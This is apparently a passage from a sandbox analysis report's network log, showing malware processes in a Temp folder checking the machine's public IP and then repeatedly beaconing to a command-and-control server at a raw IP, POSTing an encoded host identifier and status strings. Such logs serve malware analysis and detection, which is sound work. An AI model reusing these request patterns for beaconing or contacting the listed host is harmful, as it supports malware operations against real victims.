Dec 10, 2024 00:47:38.317143917 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76897 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50144	104.16.185.241	80	5724	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:41.933199883 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 10, 2024 00:44:43.032651901 CET	535	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:42 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=KDosl4xX7F569aZnCVj0fQoZLy33gsY5OhrbhAZxPQc-1733787882-1.0.1.1-7Oc7j82DSxmJVhMfMa5Xi_E_2kw4rd3cOumUQccodclIFXPjQPjisfo9q6j7eiw8O2T6sfOY_CcoFfzALUgIpQ; path=/; expires=Tue, 10-Dec-24 00:14:42 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ef8dd5bef117c81-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50145	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:42.269798040 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:43.653393984 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50158	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:45.389827967 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:46.769167900 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50166	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:48.400671959 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:49.753624916 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50176	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:51.509870052 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:52.837740898 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50186	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:54.483815908 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:55.856877089 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50194	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:57.602909088 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:59.065942049 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50199	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:00.705251932 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:02.149355888 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50200	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:03.902692080 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:05.282779932 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50210	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:06.922415972 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:08.306900024 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50213	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:10.043227911 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:11.393704891 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50215	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:13.025809050 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:14.358805895 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50217	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:16.106976986 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:17.456341028 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50218	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:19.084633112 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:20.448440075 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50220	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:22.204690933 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:23.559369087 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50221	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:25.205368996 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:26.540057898 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50224	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:28.298561096 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:29.631227970 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50226	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:31.277405977 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:32.631546974 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50228	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:34.381840944 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:35.760485888 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50232	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:37.397109985 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:38.793921947 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50233	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:40.538563967 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:41.870523930 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50234	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:43.515650988 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:44.848572969 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50236	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:46.590945005 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:47.933099031 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50237	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
